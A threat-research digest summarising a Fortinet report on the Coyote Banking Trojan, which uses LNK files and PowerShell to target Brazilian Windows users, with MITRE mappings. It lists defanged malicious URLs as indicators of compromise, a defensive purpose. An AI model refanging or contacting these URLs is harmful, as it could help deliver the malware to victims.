FOCUS MODE
EXTRACT IOC
Threat Research

Coyote Banking Trojan: A Stealthy Attack via LNK Files

Fortinet
Coyote Banking Trojan: A Stealthy Attack via LNK Files
This article discusses the multi-stage attack involving the Coyote Banking Trojan, which primarily targets Microsoft Windows users in Brazil. The attack begins with malicious LNK files that execute PowerShell commands to download further payloads. The Trojan is capable of keylogging, capturing screenshots, and phishing. The severity of the threat is high due to its capability to harvest sensitive information from numerous financial applications. Affected: Microsoft Windows

Keypoints :

  • FortiGuard Labs identified LNK files executing PowerShell commands to deliver the Coyote Banking Trojan.
  • The malware targets users in Brazil, aiming to collect sensitive information from over 70 financial applications.
  • The Trojan can perform keylogging, capture screenshots, and display phishing overlays.
  • Initial access is gained through malicious LNK files that connect to remote servers.
  • The attack employs a multi-stage process, utilizing various payloads and techniques for execution and persistence.
  • Fortinet products can detect and block the malware effectively.

MITRE Techniques :

  • Execution (T1203) – The LNK file executes a PowerShell command to download and run malicious scripts.
  • Persistence (T1547) – The malware modifies the registry to maintain persistence through a PowerShell command.
  • Credential Access (T1056) – The Trojan performs keylogging to capture user credentials.
  • Exfiltration (T1041) – The malware sends collected sensitive information back to a remote server.
  • Command and Control (T1071) – The Trojan communicates with its command and control servers to receive instructions and send data.

Indicator of Compromise :

  • [url] hxxps://tbet.geontrigame[.]com/zxchzzmism
  • [url] hxxps://yezh.geontrigame[.]com/vxewhcacbfqnsw
  • [url] hxxps://btee.geontrigame[.]com/mvkrouhawm
  • [url] hxxps://qmnw.daowsistem[.]com/fayikyeund
  • [url] hxxps://bhju.daowsistem[.]com/iwywybzqxk
  • Check the article for all found IoCs.

Full Research: https://feeds.fortinet.com/~/911964548/0/fortinet/blog/threat-research~Coyote-Banking-Trojan-A-Stealthy-Attack-via-LNK-Files

Tags: LEARN, PERSISTENCE, WINDOWS, CREDENTIAL, FINANCIAL, DISCOVERY, TROJAN, PHISHING